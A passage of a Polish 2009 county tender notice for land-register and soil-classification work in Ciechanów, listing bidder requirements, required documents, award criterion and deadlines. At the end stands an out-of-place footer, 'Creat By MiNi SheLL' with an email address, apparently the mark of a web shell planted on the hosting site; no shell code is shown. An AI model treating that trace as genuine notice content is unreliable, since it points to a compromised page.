3)	nie złożyli oświadczenia o spełnieniu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków lub złożone dokumenty zawierają błędy, z zastrzeżeniem art. 26 ust. 3;
4)	nie wnieśli wadium, w tym również na przedłużony okres  związania ofertą, lub nie zgodzili się na przedłużenie okresu związania ofertą.

Ponadto do przetargu mogą przystąpić wykonawcy, którzy :

5)	Udzielą gwarancji na wykonane przez siebie prace , na okres nie krótszy niż 3 lata i rękojmi wg Kodeksu Cywilnego
6)	Złożą oświadczenie, że zapoznali się z dokumentacją przetargową i przyjmują ją bez zastrzeżeń 
7)	Wniosą w terminie określonym w SIWZ wadium w formie pieniężnej 
8)	Przyjmą warunek 21 dniowego związania ofertą określonym przez zamawiającego SIWZ
9)	Złożą pozytywne referencje wydane przez geodetę powiatowego , w terenie którego powiatu były wykonywane prace związane z zakładaniem, modernizacją lub aktualizacją (w tym prace klasyfikacyjne) ewidencji gruntów, z wyjątkiem jednostek które wykonywały wymieniony asortyment prac na terenie powiatu ciechanowskiego..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Na potwierdzenie spełnienia przez oferenta warunków określonych w części V, na  podstawie art. 25 i 26  ust.2 Zamawiający prosi o przedstawienie przy złożonej ofercie  następujących dowodów w postaci dokumentów lub oświadczeń:
 Ad V-1 Dokument potwierdzający status prawny oferenta wraz z datą rozpoczęcia 
działalności gospodarczej w dziedzinie geodezji lub klasyfikacji gruntów albo 
poświadczony  wyciąg z aktu rejestracji lub aktualną umowę spółki , czy
potwierdzenie zgłoszenia działalności gospodarczej. Dokumenty muszą mieć
potwierdzoną cechę aktualności na czas przetargu , nie mogą być wystawione 
przed upływem 3 m-cy od daty złożenia oferty oraz winny być przedłożone w
oryginale  czy  poświadczonej kopii. Jeśli oferent będzie wykonywał zamówienie za pomocą innego podmiotu, który udostępni potencjał techniczny i osoby zdolne  do wykonania zamówienia, to dodatkowo załącza dokumenty potwierdzające statut prawny tegoż podmiotu z data rozpoczęcia działalności w dziedzinie geodezji (i klasyfikacji gruntów)
              a ponadto
-   jeśli oferent przedstawi  warunkową umowę cywilno-prawną na wykonanie
    aktualizacji użytków gruntowych i ponownej klasyfikacji gleboznawczej
    zmienionych użytków gruntowych lub umowę cywilno- prawną na wykonanie
    prac  geodezyjnych na obszarze będącym przedmiotem zamówienia, z podmiotem
    prowadzącym działalność z zakresu klasyfikacji lub w zakresie geodezji to
    zobowiązany jest do złożenia odpisu z właściwego rejestru,kopii umowy spółki
    albo zaświadczenia o wpisie do ewidencji działalności gospodarczej,
    wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania
    ofert - dla swego partnera gospodarczego określonego w umowie. Dowody
     opisane wyżej nie dotyczą osób z którymi zawarto warunkową umowę o nadzór
     klasyfikacyjny.
     -    jeśli ofertę składa konsorcjum to ponad w/w dowody dotyczące  statusu 
     prawnego  każdego z partnerów, wymagane jest  złożenie kopii umowy o 
     powołaniu  konsorcjum w jednoznaczny sposób określającej:
           a) termin obowiązywania umowy, który nie może być krótszy niż termin
               wygaśnięcia uprawnień Zamawiającego  z tytułu gwarancji i rękojmi
                należytego wykonania zamówienia,
           b) partnera wiodącego (przedstawiciela) i zakres upoważnienia do
               występowania w imieniu pozostałych partnerów, w szczególności 
               możliwości zaciągania zobowiązań  i płatności w imieniu i na rzecz 
              każdego z podmiotów występujących  łącznie,
          c) zakres odpowiedzialności za niewykonanie lub nienależyte wykonanie
              zamówienia
 AdV-2a) W przypadku, 
            a) gdy oferentem będzie podmiot z obszaru geodezji należy  przedstawić:
               wykaz prac geodezyjnych związanych z ewidencją gruntów z ostatnich 
               pięciu lat działalności oferenta lub 10 lat  z zaliczeniem działalności 
               jednostki - poprzedniczki prawnej wg zasad określonych w cz. V-2 z 
               podaniem: roku realizacji, obrębu , asortyment robót , ilości jednostek 
               powierzchni , a także wykaz prac podmiotu wykonującego prace 
               klasyfikacyjne wykonane pod rządami  wymienionych wyżej przepisów o 
               klasyfikacji,  zrealizowanych przez klasyfikatorów,  którzy będą 
              wykonywać prace klasyfikacyjne, wg podanego  schematu wykazu prac:
              rok realizacji, obręb, asortyment klasyfikacyjny, powierzchnia.
            b) gdy oferentem będzie podmiot z zakresu klasyfikacji gruntów: wykazu 
                prac klasyfikacyjnych z ostatnich 5 lat lub 10 z zaliczeniem poprzednika 
                prawnego z podaniem: osoby klasyfikatora, roku realizacji, nazwy 
                obrębu, powierzchni  sklasyfikowanych gruntów oraz wykazu prac 
                geodezyjnych  z asortymentów związanych z ewidencją gruntów i 
                dokumentacjami dla celów prawnych wykonanych przez geodetów, 
                którzy będą wykonywać prace  geodezyjne  wg  układu wymienionego
                dla tych prac: rok realizacji, asortyment  prac geodezyjnych, ilość
                jednostek, powierzchnia.
           c) gdy oferentem będzie konsorcjum firm to odpowiednie wykazy w zakresie:                                                                                                         - prac geodezyjnych,
     - klasyfikacyjnych ( z aktualizacją użytków) 
  składają  do oferty wszystkie firmy tworzące konsorcjum. Struktura wykazów jw.
 AdV- 2b  Wykaz posiadanego sprzętu geodezyjnego komputerowego i oprogramowania przeznaczonego do realizacji zamówienia,
 AdV-2c-  Wykaz osób , które będą wykonywać zamówienie w zakresie :
                  a) prac geodezyjnych
                  b) prac klasyfikacyjnych
oraz oświadczenie właściciela, wspólników o statusie zatrudnienia osób wykazanych.
                 Minimalną ilość osób, którym oferent zamierza powierzyć wykonanie zadania określa pkt V-2cA i 2cB.
W przypadku klasyfikatorów lub geodetów nie będących pracownikami oferenta należy  w dokumentacji oferty przedstawić warunkową umowę cywilną prawną zawartą  z podmiotem wykonującym prace klasyfikacyjne  lub prace geodezyjne. Z wykazu osób wykonujących zamówienia winno wynikać czyimi są pracownikami i na jakim statusie. Wykaz i zaświadczenia składa oferent. W przypadku klasyfikatorów lub geodetów zatrudnionych w jednostkach tworzących konsorcjum firm wykazy i oświadczenia składają upoważnieni przedstawiciele partnera wiodącego.

W przypadku inspektora nadzoru klasyfikacyjnego oferent składa w dokumentacji oferty kopię warunkowej umowy cywilno-prawnej o wykonanie nadzoru z osobą posiadającą wpis na listę WINGK-a Woj. Mazowieckiego.
             
                  Ponadto do wykazu osób, które będą realizować zamówienie, oferent załącza:
- dla geodetów:

* kopie uprawnień zawodowych w zakresie 1 i 2 i kopie dyplomów ukończenia uczelni czy szkół średnich dla osób, które nie posiadają uprawnień zawodowych

- dla klasyfikatorów:
* kopie dyplomów ukończenia uczelni lub szkół średnich
* kopie wpisów na listy jednego z WINGiK-ów, a dla inspektora nadzoru klasyfikacji  -   kopia wpisu na listy WINGiK-a woj. Mazowieckiego
* inne dowody potwierdzające posiadane kwalifikacje  z zakresu klasyfikacji gruntów. 

 AdV-3a   Zaświadczenie właściwego Urzędu  Skarbowego potwierdzającego ,że oferent nie zalega z opłacaniem podatków, wydane nie później niż 90 dni przed złożeniem oferty
   AdV-3b  Zaświadczenie właściwego ZUS-u potwierdzające, że oferent nie zalega w opłatach i obowiązujących składkach  na ubezpieczenie zdrowotne i społeczne, wydane nie później niż 90 dni przed złożeniem oferty
   AdV-3c   Oświadczenie oferenta , iż jego sytuacja ekonomiczna i finansowa pozwala na  zaangażowanie środków własnych w wysokości 80% wartości zamówienia  określonego w ofercie do czasu ostatecznego odbioru i rozliczenia końcowego co  gwarantuje wykonanie zamówienia  
  AdV-4     Oświadczenie oferenta o nie podleganiu wykluczeniu z postępowania o 
udzielenie zamówienia publicznego na podstawie któregokolwiek z przesłanek wymienionych w art. 24 ust 1 i 2
 AdV-5      Oświadczenie o udzieleniu 3 letniej gwarancji i rękojmi z KC na  wykonany przez siebie przedmiot zamówienia
 Ad V-6      Oświadczenie , że oferent zapoznał się z dokumentacją przetargową i przyjmuje ją bez zastrzeżeń 
 Ad V -7    Oryginał lub potwierdzona kopia dowodu bankowego lub kasowego  na konto Zamawiającego określonego w SIWZ wadium na okres postępowania
 i  związania ofertą 
 Ad V -8    Oświadczenie o przyjęciu warunków 21 dniowego związania ofertą w kreślonym w SIWZ
 Ad V-9      Opinie referencyjne dotyczące przedmiotowego asortymentu prac wydane przez geodetów powiatowych na terenie powiatów w obszarze których wykonywane były prace jak w zad. CIECHANÓW III..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://stciechanow.bip.org.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Ośrodek Zasobu Geodezyjno - Kartograficznego, ul. Wyzwolenia 10a, Kierownik Ośrodka - inż. Wiesław Niedziałkowski.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.08.2009 godzina 10:00, miejsce: Starostwo Powiatowe w Ciechanowie ul. 17 Stycznia 7 06 - 400 Ciechanów, pokój nr 108.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 21 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com